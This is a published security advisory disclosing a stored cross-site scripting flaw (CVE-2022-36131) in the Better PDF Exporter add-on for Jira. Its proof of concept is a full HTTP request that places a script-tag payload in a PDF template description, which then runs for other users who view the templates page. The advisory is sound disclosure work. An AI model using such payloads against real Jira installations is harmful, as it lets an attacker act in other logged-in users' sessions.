-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512
Advisory ID: SYSS-2022-038
Product: Better PDF Exporter for Jira
Manufacturer: Midori Global Consulting Kft.
Affected Version(s): 10.0.0
Tested Version(s): 9.6.0
Vulnerability Type: Stored Cross-Site Scripting (CWE-79)
Risk Level: Low
Solution Status: Open
Manufacturer Notification: 2022-05-27
Solution Date: -
Public Disclosure: 2022-07-22
CVE Reference: CVE-2022-36131
Author of Advisory: Lukas Faiß, SySS GmbH
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Overview:
Better PDF Exporter is an add-on for Jira to export Jira artifacts to
PDF files.
The manufacturer describes the product as follows (see [1]):
"Better PDF Exporter exports Jira issues to PDF documents to share,
print, email, archive and report issues in the standard business
document file format."
Due to insufficient input validation of user-provided input, Better PDF
Exporter is vulnerable to cross-site scripting attacks.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Vulnerability Details:
The 'PDF Templates' overview is prone to a stored cross-site scripting
attack. XSS vulnerabilities allow an attacker to embed malicious
JavaScript code into server replies which is later executed in the
web browsers of other users. By executing JavaScript, attackers can, for
example, perform actions in the context of other logged-in users.
For testing purposes, the add-on of the manufacturer[1] was used in
a local Jira Server[4] installation.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Proof of Concept (PoC):
The 'PDF Template' view in the administration back end can be exploited
for an attack.
After entering the attack vector "" in the description field of a PDF template, the following
request is sent to the server:
POST /rest/com.midori.jira.plugin.pdfview/1.0/pdf-resource/30 HTTP/2
Host: [REDACTED]
Cookie:
Content-Length: 153
Sec-Ch-Ua:"Not A;Brand";v="99","Google Chrome";v="101"
Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Sec-Ch-Ua-Mobile: ?0
User-Agent:
Sec-Ch-Ua-Platform: "Linux"
Origin: [REDACTED]
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: [REDACTED]/secure/update-pdf-resource.jspa?id=30
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
name=Pentest.pdf&description=%3cscript%3ealert('SySS_PXSS_PoC')%3b%3c
%2fscript%3e&content=content
By calling the 'PDF Template' overview page through the URL
"https://[REDACTED]/secure/pdf-resources.jspa", the payload is loaded
and executed. The payload is listed in the following response:
...
Pentest.pdf
|
|